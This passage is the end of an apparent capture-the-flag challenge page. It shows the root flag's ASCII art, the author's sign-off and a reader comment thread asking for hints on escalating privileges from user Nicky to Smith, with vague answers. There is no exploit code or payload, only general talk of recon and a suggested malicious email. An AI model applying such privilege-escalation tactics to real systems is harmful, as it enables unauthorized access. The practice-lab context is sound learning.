Apr 10 21:45 .viminfo drwx------ 2 root root 4.0K Jun 9 2019 .vnc -rw------- 1 root root 56 Jun 9 2019 .Xauthority -rw------- 1 root root 2.4K Jun 9 2019 .xsession-errors
root@nsa-server:~# cat root.txt ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░░░▓████████████████████████▒░░░░░░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░▓█████▓▒░░░░░░░░░░░░░░░▒██████▒░░░░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░████▒░░░░░░░░░░░░░░░░░░░░░░░░░▓███▒░░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░███░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░▒██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒██░░░░░░░░░░░░░░ ░░░░░░░░░░░░▒██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░░░░░░░░░░░░ ░░░░░░░░░░░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░░░░░░░░░░░ ░░░░░░░░░░░██▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░░██░░░░░░░░░░░░ ░░░░░░░░░░░██░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░██░░░░░░░░░░░ ░░░░░░░░░░░██░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░██░░░░░░░░░░░ ░░░░░░░░░░░██░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░██░░░░░░░░░░░ ░░░░░░░░░░░██▒░██▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██▓░▒██░░░░░░░░░░░ ░░░░░░░░░░░░██░░██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░██░░██░░░░░░░░░░░░ ░░░░░░░░░░░░██▒░██░░░░░▒▒▓███▒░░░░░░░▒███▓▒▒░░░░░██░▓██░░░░░░░░░░░░ ░░░░░░░░░░░░░██░██░░██████████▒░░░░░▓██████████░░██▒██░░░░░░░░░░░░░ ░░░░░░░░░░░░░░████░████████████░░░░░████████████░████░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░███░▒██████████░░░░░░░██████████▒░██▒░░░░░░░░░▒░░░░░ ░░░▒████░░░░░░░▓█▒░░█████████░░░░░░░░░█████████░░▒█▓░░░░░░▓████░░░░ ░░░██░▒██▒░░░░░██░░░░██████▓░░░░█░█░░░░███████░░░░██░░░░░███░░██░░░ ░░░██░░░██▓░░░░██░░░░░░▒▓▓░░░░▒██░██░░░░░▓▓▒░░░░░▒██░░░░███░░░██░░░ ░▓██▒░░░░████▓░░██░░░░░░░░░░░░███░███░░░░░░░░░░░░██░░█████░░░░▓██▒░ ██▓░░░░░░░░▒████████▓░░░░░░░░████░███▓░░░░░░░▒▓████████░░░░░░░░░███ ██▓▒▓███▓░░░░░░▓████████▓░░░░████░███▓░░░░▓████████▓░░░░░░████▓▓███ ░███████████▒░░░░░░███████░░░░██░░░██░░░░██████▓░░░░░░▓███████████░ ░░░░░░░░░░▓█████░░░░██▓▓░██░░░░░░░░░░░░░██░█▒██░░░▒█████▓░░░░░░░░░░ ░░░░░░░░░░░░░▒█████▒▒█▓█░███▓▓▒▒▒▓▒▒▓▓▓███▒███░▓█████░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░▒████▒▓█▒▒█░█▒█░█░█▓█▒█▓░█░█████▒░░░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░░██░░██▓█▓█▓█▒█▒█▓█▓████░▓█▓░░░░░░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░▓████▓░▓█▓█░█▒█░█░█▒█▒███▒░██████░░░░░░░░░░░░░░░░░ ░░░░░░░░░░░░░▓█████░░██░░░▒█████▓█▓█████▒░░░██░▒█████▓░░░░░░░░░░░░░ ░░░░▒██████████▓░░░░░███░░░░░░░░░░░░░░░░░░░██▒░░░░░▓██████████▒░░░░ ░░░░██░░░▓▓▓░░░░░░▒██████▓░░░░░░░░░░░░░░░███████▒░░░░░░▓▓▒░░▒██░░░░ ░░░░▓██░░░░░░░░▓████▓░░░█████▒░░░░░░▒▓█████░░░▓████▓░░░░░░░▒██▓░░░░ ░░░░░░███░░░░████▒░░░░░░░░▓█████████████▒░░░░░░░░▒████░░░░███░░░░░░ ░░░░░░░██░░░██▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▓██░░░██░░░░░░░ ░░░░░░░██▒▓██░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒██▒▓██░░░░░░░ ░░░░░░░░████░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░████░░░░░░░░ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░ CONGRATULATIONS!!!! YOU JUST PWND THIS MACHINE
— finished —
And there you have it.
I really hope you liked this machine and the challenges it presented.
A shout-out would be appreciated and good luck with your next challenge….
hi bro,why did I add nsa-server.net nsa-secretserver.net resolution under hosts, or redirect to nsa-server.net.
in hosts:
192.168.123.19 nsa-server.net nsa-secretserver.net
the /etc/hosts file is used by your system to lookup hosts when connecting to them through domain name instead of IP address.
when your system wants to connect to another system by the use of a domain name and it doesn’t know the IP address, it uses the name-servers that are available in its configuration (DNS).
but before it looks for the name-servers, it will check the hosts file first.
Hi!
Any clues to escalate privileges to the “smith” user? Thank you in advance
Not really…..any clue will give away the answer.
Hi,
I’d like to get a tiny nudge / push in the right direction for user “Smith”. Spend already more than a day on this user but nothing. None of the common tools or manual enumeration helped me.
Thanks!
do you have access to user smith already or do you try to get access to user smith?
We are the same, we try to access the user “smith”.
Which users do you already have compromised and from which user do you try to jump to user smith?
All users, I’m trying to jump from “Nicky” to “Smith”.
I have done: John > George > Samantha > Nicky
I need user Smith and Root.
In this phase…..a basic recon is required.
You need to know what is happening on this machine and who has access to what.
When you figure that out, the solution is in front of you.
The only thing I found is:
Both John and Smith are member of the group ‘mail’. I read a comment between John and Graham about Smith is possibly reading their email. So maybe send some malicious email from John to Smith ?`
I already have tried something like that but untill now not managed to get that worked and I am not sure it Smith is reading his mail every one and then?!
P.s.: If this message is too much spoiler then please reply by email to me please !
You’ve got mail 🙂
Bedankt voor de email. Heb je mijn reactie daarop ook gehad (ik zag dat je een tijdelijk emailadres gebruikte) ?!
Ik vermoed dat jouw hint ging over Smith -> Root (dat zal via [SPOILER] gaan?!), maar ik moet eerst Smith zien te worden via een van de andere gebruikers (Nicky, Samantha, John of Graham) en daar zou ik graag een hint over willen 🙂
You’ve got mail 🙂
I have the same question, I’m with user “Nicky” and I’m looking for a way to pass to user “Smith”, could you give me some hint? (Do it by mail to avoid the spoiler). Thanks in advance.
With a basic recon, you will find something on the system that user Nicky has access too.
To get access you need a piece of information you probably don’t have yet, because of the way you escalated to this user.
Once you find those 2 things, the way to user smith will become clear.
Ik heb op de 20e geen email ontvangen! Kun je hem nog eens doorsturen aub?
Check mijn reply op David (21-6-2020)
got nicky, towards smith now
why is user smith that hard to escalate to?
ive been turning every stone in this machine and apparently i must have missed something…
connecting with v.. to that desktop didnt reveal anything that i havent seen from the terminal session.
im really stuck and would appreciate a small nudge to proceed
Escalating to user smith isn’t that hard (I know it’s easy for me to say), but the path to take is relatively easy when you have all the information.
Look for files, then look for a service (you really need the file or no access to this service, enumerate your findings and escalate to user smith.
I just added escalating from Samantha to Nicky and I’ll be posting getting to smith next week.
Thanks for a really nice challenge. It was hard but very cool
glad you liked it